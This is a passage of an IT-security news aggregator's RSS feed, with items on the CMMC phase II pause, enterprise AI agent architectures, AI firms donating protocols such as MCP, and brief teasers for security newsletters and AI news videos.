href="https://arcova.com/category/blog/">https://arcova.com/category/blog/</a></li> </ul> <p>For more information about Arcova and how they can help your enterprise shape what's next, please visit:</p> <p><a rel="noopener" target="_blank" href="https://securityweekly.com/arcova">https://securityweekly.com/arcova</a></p> <h3>Topic: CMMC Pause creating chaos among federal contractors</h3> <p>This one sent some shockwaves through the CMMC community, particularly the hundreds or thousands of folks gearing up to assist with the validation that phase 2 aimed to provide. The TL;DR - defense contractors have been required to comply with CMMC controls for years, but self-attestation means that many probably haven't been meeting the requirements. Perhaps, rather than have tons of defense contractors fail the test, they just suspended the requirement for the test itself.</p> <p>I think Howard Holton nails it here when he says:</p> <p>"100,000 defense contractors needed third-party assessments. Roughly 100 authorized assessors exist. That's 1,000 assessments each, with the deadline in November."</p> <p>PCI already created a model that works for a scenario like this. If you're small, you self-assess. If you're big enough, an independent auditor comes to check you out once a year. I'm sure they were probably aware of this and chose not to go down that path for some reasons. I'm not aware of those reasons.</p> <p>What this means:</p> <ul> <li>Phase II is paused</li> <li>Phase I self-assessments still in place (note, however, that phase II existed, because self-attestation didn't work)</li> <li>NIST SP 800-171 Rev 2 and DFARS 252.204-7012 compliance still required</li> <li>60-day review aims to reform CMMC</li> <li>DoW opened an RFI for industry perspectives on what they should do</li> <li>CMMC characterized as a "compliance burden" and "red tape"</li> <li>False Claims Act and DOJ's cyber-fraud enforcement are still on the table</li> </ul> <p>More resources:</p> <ul> <li>CIO Davies' post on Twitter</li> <li>Administrator of the Small Business Administration, Kelly Loeffler's post</li> <li>A useful LinkedIn post that breaks down a lot of what this really means (and doesn't)</li> </ul> <h3>Weekly Enterprise News</h3> <p>Finally, in the enterprise security news,</p> <ol> <li>will AI eliminate more cybersecurity jobs than it creates?</li> <li>Linus's law, amended</li> <li>the biggest patch Tuesday ever</li> <li>AI context bombs</li> <li>AI workflows are a security disaster</li> <li>people using AI in areas they don't understand</li> <li>ransomware crews are hitting legal firms hard</li> <li>lessons learned from CISA's recent github leak</li> <li>demystify your USB cables!</li> </ol> <p>All that and more, on this episode of Enterprise Security Weekly.</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/esw">https://www.securityweekly.com/esw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/esw-468">https://securityweekly.com/esw-468</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The 6 kinds of AI agent architectures]]></title>
<description><![CDATA[Somewhere in the last eighteen months, “AI agent” stopped being a useful term. CIOs may even be afraid to ask what “agent” truly means, as it now seems to describe everything from a chatbot that answers HR questions to an autonomous research system that plans its own week of work. When a single p...]]></description>
<link>https://tsecurity.de/de/3680680/it-security-nachrichten/the-6-kinds-of-ai-agent-architectures/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680680/it-security-nachrichten/the-6-kinds-of-ai-agent-architectures/</guid>
<pubDate>Mon, 20 Jul 2026 11:09:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Somewhere in the last eighteen months, “AI agent” stopped being a useful term. CIOs may even be afraid to ask what “agent” truly means, as it now seems to describe everything from a chatbot that answers HR questions to an autonomous research system that plans its own week of work. When a single phrase carries that much weight, well, it stops carrying any.</p>



<p class="wp-block-paragraph">I’ve spent the last three years inside hundreds of enterprise AI deployments, and the factor that separates the programs scaling elegantly from the ones still shuffling is often the CIO’s architectural fluency: The ability to look at business problems across the organization and recognize, on sight, what kind of AI architecture is the right fit. In my experience there are six archetypes, each with their own nuances, that CIOs should internalize to make well-informed decisions going forward.</p>



<h2 class="wp-block-heading">1. The conversational assistant</h2>



<p class="wp-block-paragraph">The first, and the one most enterprises meet first, is the conversational assistant: The chat-based partner that an employee or customer opens when they want to think out loud. <a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html?id=us:2ps:3gl:aisgm26:awa:CONS:em:K0218784:012626:kwd-430833501819:195648817121:794247818306::&amp;gclsrc=aw.ds&amp;gad_source=1&amp;gad_campaignid=23269751971&amp;gbraid=0AAAAADenGPCB8F-Mx6GhUt0V1PWpgLqtw&amp;gclid=Cj0KCQjwi8nRBhDhARIsAHZf_pYktgKgYgYBAR6AcMikwdYOF7q6S3WaLiLYg2hwhvdCjRiqajxnqtkaAsdYEALw_wcB">Deloitte found that 38%</a> of organizations report AI is already strengthening their client or customer relationships. This is the architecture people fall in love with: A well-designed assistant with constantly updated information, persistent user-level memory, tools that can act on behalf of users, and citations on every factual claim becomes a useful problem-solver that’s available at any hour of the day.</p>



<p class="wp-block-paragraph">A global law firm I work with deployed an internal assistant that gives every attorney instant access to the firm’s accumulated precedent, memos and prior matter work. Associates who used to spend the first hour of a research task hunting through document management systems now start with a grounded, citation-backed answer and refine from there. This helped the firm’s institutional knowledge, previously locked in the heads of senior partners, become queryable by anyone with a deadline at 11 p.m., or later.</p>



<p class="wp-block-paragraph">A second example: A mid-market wealth management firm built a client-facing assistant that handles portfolio questions, statement explanations and routine servicing requests. The assistant draws from each client’s actual holdings, recent activity and the firm’s published market commentary, with citations linking back to source documents. Advisors stopped being interrupted for the questions that didn’t require an advisor, and clients got answers on a Sunday.</p>



<h2 class="wp-block-heading">2. The triggered workflow</h2>



<p class="wp-block-paragraph">Another pattern producing the value across the enterprises I work with is something that runs silently: An email arrives, a ticket is created, a file lands in a folder and the agent executes a process utilizing both reasoning and determinism. These agents don’t even require user adoption, because they’re invisible to the end user. They produce measurable outcomes, but fit cleanly into the audit and change-control processes IT teams have run for decades.</p>



<p class="wp-block-paragraph">A commercial insurer I advise built a triggered workflow for inbound submissions. Every broker email that arrives at the underwriting inbox is classified by line of business, the attachments are parsed, key risk fields are extracted into the policy administration system, and a draft acknowledgment is queued for the underwriter’s review. Seemingly overnight, the inbox began arriving pre-sorted, and submission throughput rose meaningfully without any change to headcount.</p>



<p class="wp-block-paragraph">Another example, this time from a private equity firm: Every inbound confidential information memorandum (CIM) that hits the deal team’s shared inbox triggers a workflow that extracts the financial summary, screens it against the firm’s investment criteria, drafts a preliminary memo and posts the result into the deal-tracking system. Associates still make the call on what to pursue, but the first three hours of manual work on each opportunity now happen before anyone even opens the file.</p>



<h2 class="wp-block-heading">3. The autonomous agent — with sub-agents</h2>



<p class="wp-block-paragraph">Here we have the architecture that gets the most conference attention: The autonomous agent, given a task and left to plan its own steps by utilizing its own sub-agents. Autonomous agents are not one-size-fits-all, but they do meet a specific need: Multi-source research, complex cross-system lookups, deep-dive investigations. All of these are processes where the path isn’t usually specified in advance, but the tools are. With the right design discipline, an autonomous agent feels like having a self-sufficient teammate who can call in the right resources and specialists if needed.</p>



<p class="wp-block-paragraph">A global consulting firm I work with uses an autonomous research agent for early-stage engagement scoping. Given a target company and a strategic question, the agent decides for itself which sub-agents to consult (choosing from internal proprietary databases, prior engagement archives, licensed market data, public filings) and produces a structured briefing with its reasoning chain attached.</p>



<p class="wp-block-paragraph">Another large technology company I know of deployed an autonomous agent for cross-system incident investigation. When a production alert fires, the agent forms a hypothesis, queries the necessary sub-agents with relevant monitoring tools, log stores and deployment systems, and follows the trail until it reaches a defensible root-cause summary to surface to an engineer.</p>



<h2 class="wp-block-heading">4. The multi-agent team</h2>



<p class="wp-block-paragraph">The fourth pattern is where the next wave of enterprise quality gains is going to come from. <a href="https://www.databricks.com/resources/ebook/state-of-ai-agents">According to Databricks</a>, usage of multi-agent systems grew 327% in just four months as enterprises moved beyond single chatbots. Several specialized agents, each with its own role and toolset, coordinate through a shared protocol: A researcher and a writer, a planner and a set of executors, a proposer and a critic. The proposer-critic feedback loop is one of the smartest techniques in agent design today. One model produces an answer; a second, with a different prompt and often a different provider, evaluates it against explicit criteria. For compliance review, contract analysis, high-stakes classification and any output that will be audited, this second pass is extremely helpful and mirrors how human teams work.</p>



<p class="wp-block-paragraph">A global bank I work with uses a multi-agent system for marketing and communications review. One agent drafts client-facing copy, a second checks it against the firm’s regulatory and brand guidelines and a third checks it against jurisdiction-specific disclosure rules. Disagreements among the agents are surfaced to a human reviewer with the specific clauses flagged. The compliance team stopped being the bottleneck on every routine piece of copy and started focusing on the high-judgment cases instead.</p>



<p class="wp-block-paragraph">The next example: A pharmaceutical company built a multi-agent workflow for medical literature summarization. A retriever agent gathers candidate studies, a reader agent extracts study design and findings, a critic agent challenges the reader’s claims against the source text, and a synthesizer agent composes the final brief. The proposer-critic loop in the middle is the reason the medical affairs team trusts the output enough to act on it.</p>



<h2 class="wp-block-heading">5. The human-in-the-loop (HITL) agent</h2>



<p class="wp-block-paragraph">The fifth pattern is the one I think we’ll see increasingly more of in the future. While many see “full automation” as the goal, the right target is actually to let the agent handle the 80% of a task that is mechanical, while preserving human judgment at the most critical moments. This is achievable via human-in-the-loop (HITL) agents. <a href="https://www.moodys.com/web/en/us/insights/ai/human-in-the-loop-why-human-oversight-still-matters-in-ai-driven-risk-and-compliance.html">According to Moody’s, 42%</a> of compliance professionals believe that human oversight is mandatory, and I agree: AI should run <em>right</em>, by getting approval and review before any sensitive business action is taken. HITL is the architecture that can help turn a skeptical team into an enthusiastic one.</p>



<p class="wp-block-paragraph">A regional health system I worked with uses a HITL agent for prior-authorization letters. The agent assembles the clinical evidence, drafts the letter against the relevant payer’s criteria, and routes it to a nurse case manager for review inside the existing workflow tool. The nurse approves, edits or rejects in seconds rather than minutes, and every edit helps make the next draft better.</p>



<p class="wp-block-paragraph">A property management company uses a HITL agent to run its maintenance work orders. When a tenant emails about a problem (an HVAC unit that died overnight, say), the agent pulls the structured details (tenant, unit, issue type, urgency), matches the job to the right vendor from the directory, and drafts the work order. A team member approves it in Slack before anything goes out. From there the agent emails the vendor with the full order, confirms with the tenant that someone is on the way and updates Airtable, closing the loop completely.</p>



<h2 class="wp-block-heading">6. The scheduled agent</h2>



<p class="wp-block-paragraph">On a set schedule or against a batch of inputs, this agent runs the same defined task: Produce a report, refresh a dataset, monitor a set of sources or summarize a period of activity. Under this archetype, unsexy work gets done consistently, integrated into existing operational rhythms like the Monday morning meeting, the daily standup and the monthly board deck, without asking anyone to change their behavior. This is the architecture that shifts AI from feeling like even more work, to a seamless teammate that just works.</p>



<p class="wp-block-paragraph">A private equity firm I work with runs a scheduled agent every Monday at 6 a.m. that monitors news, filings and earnings activity across every portfolio company and produces a single PDF that lands in the deal partners’ inboxes before the weekly investment meeting. No one logs into a dashboard. The agent shows up, on time, with the same format every week, and the meeting now starts from a shared baseline rather than from whatever each partner happened to read over the weekend.</p>



<p class="wp-block-paragraph">A second example: A global manufacturer runs a nightly batch agent that ingests the day’s quality-control reports across plants, summarizes anomalies against a rolling baseline, and produces an end-of-shift handoff document for each site lead’s morning. The agent doesn’t flag emergencies, but it ensures that the slow-moving patterns no human would catch reading one shift’s data in isolation get surfaced.</p>



<h2 class="wp-block-heading">Bringing it together</h2>



<p class="wp-block-paragraph">None of these six archetypes is more advanced than the others or inherently better. But CIOs can have an edge by choosing the one that the operational problem actually calls for.</p>



<p class="wp-block-paragraph">Before you scope a single deployment, you should be able to look at a business problem and name its shape: Is this a question someone needs answered in the moment, or a process that should run the instant a trigger fires? Does the path need to be discovered, or is it known in advance and just waiting to be executed? Where, exactly, does human judgment have to stay in the loop, and where is it just friction?</p>



<p class="wp-block-paragraph">Going forward, CIOs should start treating the architecture decision as the first design choice. Everything downstream — adoption, governance, trust — only gets easier if the architecture is the right fit.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The gravitational pull of AI]]></title>
<description><![CDATA[Last year Anthropic gave away one of the most successful things it has ever built. And, no, I’m not talking about Claude. I’m referring to MCP, the now ubiquitous Model Context Protocol, which Anthropic donated to the Linux Foundation’s new Agentic AI Foundation⁠. At the time, MCP was pulling nea...]]></description>
<link>https://tsecurity.de/de/3680668/ai-nachrichten/the-gravitational-pull-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680668/ai-nachrichten/the-gravitational-pull-of-ai/</guid>
<pubDate>Mon, 20 Jul 2026 11:04:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Last year Anthropic gave away one of the most successful things it has ever built. And, no, I’m not talking about Claude. I’m referring to MCP, the now ubiquitous Model Context Protocol, which Anthropic <a href="https://anthropic.com/news/donating-the-model-context-protocol-and-establishing-of-the-agentic-ai-foundation">donated to the Linux Foundation’s new Agentic AI Foundation</a>⁠. At the time, MCP was <a href="https://blog.modelcontextprotocol.io/posts/2025-12-09-mcp-joins-agentic-ai-foundation/">pulling nearly 100 million monthly SDK downloads</a> across more than 10,000 active servers⁠, prompting the question as to why any company would give up such a popular piece of technology.</p>



<p class="wp-block-paragraph">Google did much the same months earlier, <a href="https://developers.googleblog.com/en/google-cloud-donates-a2a-to-linux-foundation/">handing its Agent2Agent (A2A) protocol</a> to the Linux Foundation⁠ with AWS, Cisco, Microsoft, Salesforce, SAP, and ServiceNow signing on as founding members. OpenAI, not to be outdone, <a href="https://openai.com/index/new-tools-and-features-in-the-responses-api/">supports remote MCP servers in its Responses API</a>⁠, sits on the MCP steering committee, and contributed AGENTS.md to that same foundation alongside its fiercest rival’s protocol.</p>



<p class="wp-block-paragraph">It’s like <em>Game of Thrones</em>, except the principal AI powers seek regime change through seeming acts of beneficence rather than violence. For those who have been around for a while, it’s also entirely predictable, following a similar script we’ve seen in the cloud, on-premises servers, and more. Platform companies don’t give away technologies they’ve stopped caring about. They give away technologies they no longer need to own because competitive advantage has shifted to new ground.</p>



<p class="wp-block-paragraph">What does this mean for AI?</p>



<h2 class="wp-block-heading"><a></a>Gravity has shifted before</h2>



<p class="wp-block-paragraph">Google has long been an exceptionally active contributor to open source. <a href="https://www.infoworld.com/article/2260293/open-source-innovation-is-now-all-about-vendor-on-ramps-2.html">As I wrote in 2017</a>, Google wasn’t open sourcing TensorFlow and Kubernetes out of generosity but rather turning these open source assets into on-ramps for Google Cloud. Google was playing catch-up to AWS and Microsoft. As <a href="https://www.infoworld.com/article/2248699/why-kubernetes-is-winning-the-container-war.html">then Google product manager Martin Buhr said</a>, the company hoped to “create a gravity well in the market for container-based apps [so] that a significant percentage of them will end up with us.”</p>



<p class="wp-block-paragraph">In other words, platform companies routinely commoditize one layer of the stack so they can compete somewhere they hold a stronger hand.</p>



<p class="wp-block-paragraph">GitHub may be an even better example. <a href="https://www.infoworld.com/article/2334697/what-is-git-version-control-for-collaborative-programming.html">Git </a>is open. Anyone can host a Git repository and, once upon a time, different companies did just that. Yet <a href="https://www.infoworld.com/article/2266566/what-is-github-more-than-git-version-control-in-the-cloud.html">GitHub </a>became the default place software development happens for millions of developers. Nobody pays for Git, but lots of people pay for GitHub. We’re seeing this same phenomenon play out in AI.</p>



<h2 class="wp-block-heading">Trading contributions for control</h2>



<p class="wp-block-paragraph">Anthrophic and OpenAI have both pretended at being all for humanity’s good, but that’s not a good explanation for why they’re racing to give away things like <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP</a>. The deeper reason is that the model itself has turned out to be a poor place to build a lasting moat, and they’re trying to figure out what’s next. <a href="https://www.infoworld.com/article/4195842/which-ai-model-should-you-bet-your-company-on-none-of-them.html">As I pointed out recently</a>, the frontier model leaderboards change almost weekly. As such, enterprises shouldn’t build their AI strategy around the assumption that any one vendor will remain permanently ahead on model quality. Instead, as I suggested, AI may be sexy, but the “dull reality” is connecting those models to enterprise data, workflows, etc.</p>



<p class="wp-block-paragraph">The AI companies understand this better than anyone. Sure, they’ll continue spending billions training ever more capable models because frontier models attract developers, generate headlines, and open enterprise doors. But they’re also quietly acknowledging that benchmark leadership alone doesn’t create a durable platform.</p>



<p class="wp-block-paragraph">Developers return to the places where their tools, workflows, teammates, and accumulated work already live. Enterprises double down on the systems where their data, permissions, governance, and business processes are already connected. Every new integration makes that destination a little harder to leave, and every new workflow increases its pull. That’s what MCP, A2A, etc., are all about: increasing gravity around the models.</p>



<p class="wp-block-paragraph">Every major AI company wants to become the place where AI-assisted work naturally happens, and they’re now amassing armies of forward deployed engineers and trying other means to get legacy infrastructure to tie back to their frontier models. The enterprise incumbents want the same thing, but from the opposite direction. They don’t need to own the frontier; instead they need to connect the frontier to the systems that already safely run the business.</p>



<p class="wp-block-paragraph">That’s why I’m skeptical whenever someone confidently predicts that AI will sweep away enterprise software. I’ve seen this movie before. Developers absolutely live on the frontier, but enterprises don’t. Enterprises create value by connecting new capabilities to decades of accumulated applications, data, policies, and business processes. The newest model matters, and so does the newest agent framework. But neither creates much business value until it’s connected to customer records, financial systems, supply chains, HR data, and everything else enterprises already depend on.</p>



<p class="wp-block-paragraph">That’s where incumbents still possess enormous gravitational pull. My employer, Oracle, certainly believes so, just as Microsoft, SAP, Salesforce, and ServiceNow do. (Disclosure: I run developer relations at Oracle, which participates in the Agentic AI Foundation.) Ironically, open protocols strengthen that position rather than weaken it. If every model can speak MCP and every agent can interoperate through common standards, enterprises gain the freedom to adopt whichever frontier technology looks best without rebuilding every integration. The protocol becomes interchangeable.</p>



<h2 class="wp-block-heading">Open standards don’t stop gravity</h2>



<p class="wp-block-paragraph">None of this diminishes the importance of open standards. MCP succeeded because it solves a genuine problem. Developers shouldn’t have to build a custom connector every time an AI application needs access to a database or other business system. Neutral governance also matters because nobody wants foundational infrastructure controlled by a direct competitor. But we shouldn’t confuse open interfaces with open markets.</p>



<p class="wp-block-paragraph">An enterprise may find it easy to swap one MCP-compatible model for another while still remaining deeply dependent on the place where its prompts, evaluations, security policies, and employee habits have accumulated. Again, we’ve seen this before. Kubernetes made workloads dramatically more portable without making AWS, Azure, and Google Cloud interchangeable. SQL has been standardized for decades, yet databases remain fiercely differentiated businesses. Standards reduce friction, but they rarely eliminate competitive advantage. They simply move it.</p>



<p class="wp-block-paragraph">In like manner, Anthropic, Google, OpenAI, and others are happily standardizing how models, agents, tools, and enterprise systems communicate because they don’t expect the connection itself to determine the winner. Instead they expect to win by becoming the place where AI-assisted work naturally accumulates. Along the way, we’re going to see copious quantities of code given away, increasing developer productivity for all and outsized financial bonanzas for a few. Game on.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Security at Scale, CMMC phase II paused, and the Weekly Enterprise News - ESW #468]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 Interview with Keith Hollender, CEO and Co-Founder of Arcova

Why AI Security Is Becoming an Execution Problem, Not Just a Governance Problem

As enterprises move from AI experimentation to adoption at scale, security leaders ...]]></description>
<link>https://tsecurity.de/de/3680666/it-security-video/ai-security-at-scale-cmmc-phase-ii-paused-and-the-weekly-enterprise-news-esw-468/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680666/it-security-video/ai-security-at-scale-cmmc-phase-ii-paused-and-the-weekly-enterprise-news-esw-468/</guid>
<pubDate>Mon, 20 Jul 2026 11:03:55 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/SwBWFeUzACI?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Interview with Keith Hollender, CEO and Co-Founder of Arcova<br />
<br />
Why AI Security Is Becoming an Execution Problem, Not Just a Governance Problem<br />
<br />
As enterprises move from AI experimentation to adoption at scale, security leaders are under pressure to enable innovation without introducing unmanaged risk. The challenge is no longer whether organizations should pursue AI, but how they can govern it, secure it, and operationalize it in ways that stand up to real-world business and threat conditions.<br />
<br />
In this conversation, Keith Hollender discusses what Arcova is seeing across enterprise environments as organizations work to connect cybersecurity, AI governance, resilience, and broader transformation priorities. He explores where companies are getting stuck, why traditional siloed approaches are falling short, and what it takes to move from strategy decks to secure execution.<br />
<br />
Keith also shares how Arcova’s practitioner-led, relationship-driven model helps organizations turn complexity into clarity by embedding with client teams, solving urgent problems hands-on, and building capabilities designed to last. The conversation also covers Arcova’s continued growth, including expansion into the Middle East, and what global demand signals reveal about the next phase of cybersecurity and AI consulting.<br />
<br />
Segment Resources:<br />
- https://arcova.com/sectors/  <br />
- https://arcova.com/category/blog/<br />
<br />
For more information about Arcova and how they can help your enterprise shape what's next, please visit: https://securityweekly.com/arcova<br />
<br />
Topic: CMMC Pause creating chaos among federal contractors<br />
<br />
This one sent some shockwaves through the CMMC community, particularly the hundreds or thousands of folks gearing up to assist with the validation that phase 2 aimed to provide.<br />
The TL;DR - defense contractors have been required to comply with CMMC controls for years, but self-attestation means that many probably haven't been meeting the requirements. Perhaps, rather than have tons of defense contractors fail the test, they just suspended the requirement for the test itself.<br />
<br />
I think Howard Holton nails it here when he says:<br />
<br />
"100,000 defense contractors needed third-party assessments. Roughly 100 authorized assessors exist. That's 1,000 assessments each, with the deadline in November."<br />
<br />
PCI already created a model that works for a scenario like this. If you're small, you self-assess. If you're big enough, an independent auditor comes to check you out once a year. I'm sure they were probably aware of this and chose not to go down that path for some reasons. I'm not aware of those reasons.<br />
<br />
What this means:<br />
<br />
- Phase II is paused<br />
- Phase I self-assessments still in place (note, however, that phase II existed, because self-attestation didn't work)<br />
- NIST SP 800-171 Rev 2 and DFARS 252.204-7012 compliance still required<br />
- 60-day review aims to reform CMMC<br />
- DoW opened an RFI for industry perspectives on what they should do<br />
- CMMC characterized as a "compliance burden" and "red tape"<br />
- False Claims Act and DOJ's cyber-fraud enforcement are still on the table<br />
<br />
More resources:<br />
<br />
- CIO Davies' post on Twitter<br />
- Administrator of the Small Business Administration, Kelly Loeffler's post<br />
- A useful LinkedIn post that breaks down a lot of what this really means (and doesn't)<br />
<br />
Weekly Enterprise News<br />
<br />
Finally, in the enterprise security news, <br />
<br />
1. will AI eliminate more cybersecurity jobs than it creates?<br />
2. Linus’s law, amended<br />
3. the biggest patch Tuesday ever<br />
4. AI context bombs<br />
5. AI workflows are a security disaster<br />
6. people using AI in areas they don’t understand<br />
7. ransomware crews are hitting legal firms hard<br />
8. lessons learned from CISA’s recent github leak<br />
9. demystify your USB cables!<br />
<br />
All that and more, on this episode of Enterprise Security Weekly.<br />
<br />
Visit https://www.securityweekly.com/esw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/esw-468<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Der Herausforderung Shadow Code mit Schutzmaßnahmen begegnen | Computer Weekly]]></title>
<description><![CDATA[In vielen Unternehmen lauert tief in ihren Systemen eine versteckte Bedrohung. Deren Risiken für den Datenschutz und die Cybersicherheit können ...]]></description>
<link>https://tsecurity.de/de/3680627/it-security-nachrichten/der-herausforderung-shadow-code-mit-schutzmassnahmen-begegnen-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680627/it-security-nachrichten/der-herausforderung-shadow-code-mit-schutzmassnahmen-begegnen-computer-weekly/</guid>
<pubDate>Mon, 20 Jul 2026 10:52:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In vielen Unternehmen lauert tief in ihren Systemen eine versteckte Bedrohung. Deren Risiken für den Datenschutz und die <b>Cybersicherheit</b> können ...]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepSeek's AI Chip, ChatGPT 5.6, Grok 4.5, AI Updates Are on RANPAGE This WEEK!]]></title>
<description><![CDATA[Author: Evolving AI - Bewertung: 0x - Views:0 This week in AI was absolutely insane.

OpenAI officially launched GPT-5.6 with its new Sol, Terra, and Luna model lineup, unveiled powerful multi-agent capabilities, and even claimed an AI-generated proof for a 50-year-old unsolved mathematics proble...]]></description>
<link>https://tsecurity.de/de/3680458/videos/deepseeks-ai-chip-chatgpt-56-grok-45-ai-updates-are-on-ranpage-this-week/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680458/videos/deepseeks-ai-chip-chatgpt-56-grok-45-ai-updates-are-on-ranpage-this-week/</guid>
<pubDate>Mon, 20 Jul 2026 09:03:24 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Evolving AI - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/BamdzUMenEQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>This week in AI was absolutely insane.<br />
<br />
OpenAI officially launched GPT-5.6 with its new Sol, Terra, and Luna model lineup, unveiled powerful multi-agent capabilities, and even claimed an AI-generated proof for a 50-year-old unsolved mathematics problem. But that's just the beginning. In this video, we cover GPT-5.6, Sol Ultra, AI training another AI, Grok 4.5, Meta's Muse Spark, ByteDance's Seedream 5.0 Pro, China's MiniMax open-source AI, DeepSeek's custom AI chip, Claude Code controversy, and the groundbreaking Orca world model from the Beijing Academy of AI. If you want to stay ahead of the AI industry with the biggest breakthroughs, news, chips, robotics, and future technologies all in one place, this weekly roundup is for you.<br />
<br />
#GPT56 #OpenAI #ArtificialIntelligence #AI #Grok #Meta #DeepSeek #Technology<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Cybersecurity Newsletter – The 50 Biggest Cybersecurity Stories – Microsoft Patch, AI Attack, Exploits Releases, Data Breaches & More]]></title>
<description><![CDATA[Welcome to this week’s edition of the GBHackers cybersecurity newsletter — your weekly cybersecurity bulletin covering the 40 most important stories from July 13–17, 2026. What a week: Microsoft shattered records with 570 vulnerabilities patched in a single Patch Tuesday,…
Read more →
The post We...]]></description>
<link>https://tsecurity.de/de/3680427/it-security-nachrichten/weekly-cybersecurity-newsletter-the-50-biggest-cybersecurity-stories-microsoft-patch-ai-attack-exploits-releases-data-breaches-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680427/it-security-nachrichten/weekly-cybersecurity-newsletter-the-50-biggest-cybersecurity-stories-microsoft-patch-ai-attack-exploits-releases-data-breaches-more/</guid>
<pubDate>Mon, 20 Jul 2026 08:38:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Welcome to this week’s edition of the GBHackers cybersecurity newsletter — your weekly cybersecurity bulletin covering the 40 most important stories from July 13–17, 2026. What a week: Microsoft shattered records with 570 vulnerabilities patched in a single Patch Tuesday,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/weekly-cybersecurity-newsletter-the-50-biggest-cybersecurity-stories-microsoft-patch-ai-attack-exploits-releases-data-breaches-more/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/weekly-cybersecurity-newsletter-the-50-biggest-cybersecurity-stories-microsoft-patch-ai-attack-exploits-releases-data-breaches-more/">Weekly Cybersecurity Newsletter – The 50 Biggest Cybersecurity Stories – Microsoft Patch, AI Attack, Exploits Releases, Data Breaches &amp; More</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Cybersecurity Newsletter – The 50 Biggest Cybersecurity Stories – Microsoft Patch, AI Attack, Exploits Releases, Data Breaches & More]]></title>
<description><![CDATA[Welcome to this week’s edition of the GBHackers cybersecurity newsletter — your weekly cybersecurity bulletin covering the 40 most important stories from July 13–17, 2026. What a week: Microsoft shattered records with 570 vulnerabilities patched in a single Patch Tuesday, China-linked hackers wea...]]></description>
<link>https://tsecurity.de/de/3680367/it-security-nachrichten/weekly-cybersecurity-newsletter-the-50-biggest-cybersecurity-stories-microsoft-patch-ai-attack-exploits-releases-data-breaches-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680367/it-security-nachrichten/weekly-cybersecurity-newsletter-the-50-biggest-cybersecurity-stories-microsoft-patch-ai-attack-exploits-releases-data-breaches-more/</guid>
<pubDate>Mon, 20 Jul 2026 08:22:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Welcome to this week’s edition of the GBHackers cybersecurity newsletter — your weekly cybersecurity bulletin covering the 40 most important stories from July 13–17, 2026. What a week: Microsoft shattered records with 570 vulnerabilities patched in a single Patch Tuesday, China-linked hackers weaponized Claude Code and DeepSeek against government networks, GPT-5.6 wrote a complete Chrome […]</p>
<p>The post <a href="https://gbhackers.com/weekly-cybersecurity-newsletter-july-13-17-2026/">Weekly Cybersecurity Newsletter – The 50 Biggest Cybersecurity Stories – Microsoft Patch, AI Attack, Exploits Releases, Data Breaches &amp; More</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DistroWatch Weekly, Issue 1182]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  This week in DistroWatch Weekly: 
Review: Smaller, community-oriented, open source solutions
